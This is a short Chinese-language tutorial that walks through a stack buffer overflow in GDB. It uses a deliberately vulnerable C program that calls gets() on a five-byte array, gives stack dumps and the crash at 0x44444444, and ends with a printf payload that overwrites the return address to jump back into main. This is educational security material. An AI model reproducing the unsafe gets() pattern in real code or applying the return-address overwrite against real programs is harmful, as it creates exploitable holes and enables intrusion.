用GDB示範Buffer Overflow 的過程
1 #include <stdio.h> 2 void return_input(void) 3 { 4 char array[5]; 5 6 gets(array); 7 printf("%s\n", array); 8 } 9 main() 10 { 11 return_input(); 12 return 0; 13 }
>gdb -q overflow
(gdb) disas return_input
Dump of assembler code for function return_input:
0x0040138c <+0>: push %ebp
0x0040138d <+1>: mov %esp,%ebp
0x0040138f <+3>: sub $0xc,%esp
0x00401392 <+6>: lea -0x5(%ebp),%eax
0x00401395 <+9>: mov %eax,(%esp)
0x00401398 <+12>: call 0x401b1c <gets>
0x0040139d <+17>: lea -0x5(%ebp),%eax
0x004013a0 <+20>: mov %eax,(%esp)
0x004013a3 <+23>: call 0x401b14 <puts>
0x004013a8 <+28>: leave
0x004013a9 <+29>: ret
End of assembler dump.
(gdb) b *0x00401398 //0x00401398 <+12>: call 0x401b1c <gets>
Breakpoint 2 at 0x401398: file overflow.c, line 6.
(gdb) b *0x004013a3 //0x004013a3 <+23>: call 0x401b14 <puts>
Breakpoint 3 at 0x4013a3: file overflow.c, line 7.
(gdb) r
(gdb) disas main
Dump of assembler code for function main:
0x004013aa <+0>: push %ebp
0x004013ab <+1>: mov %esp,%ebp
0x004013ad <+3>: call 0x4018dc <__main>
0x004013b2 <+8>: call 0x40138c <return_input>
0x004013b7 <+13>: mov $0x0,%eax
0x004013bc <+18>: pop %ebp
0x004013bd <+19>: ret
End of assembler dump.
(gdb) x/20x $esp //0x004013b7為returnaddress,$esp=0x28ff14,$ebp=0x0028ff28
0x28ff14: 0x0028ff1b 0x00000026 0x7efde000 0x0028ff28
0x28ff24: 0x004013b7 0x0028ff68 0x004010b9 0x00000001
0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811
(gdb) cont
Continuing.
ABCDEDDDDDDDD
(gdb) x/20x 0x28ff14
0x28ff14: 0x0028ff1b 0x41000026 0x45444342 0x44444444
0x28ff24: 0x44444444 0x0028ff00 0x004010b9 0x00000001
0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811
(gdb) step
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? () //成功改掉return address
====串改return address=====
>printf "ABCDEDDDD\xb2\x13\x40\x00" | overflow //jmp to 0x004013b2 <+8>: call 0x40138c <return_input>
ABCDEDDDD?@
ABCDEDDDD?@
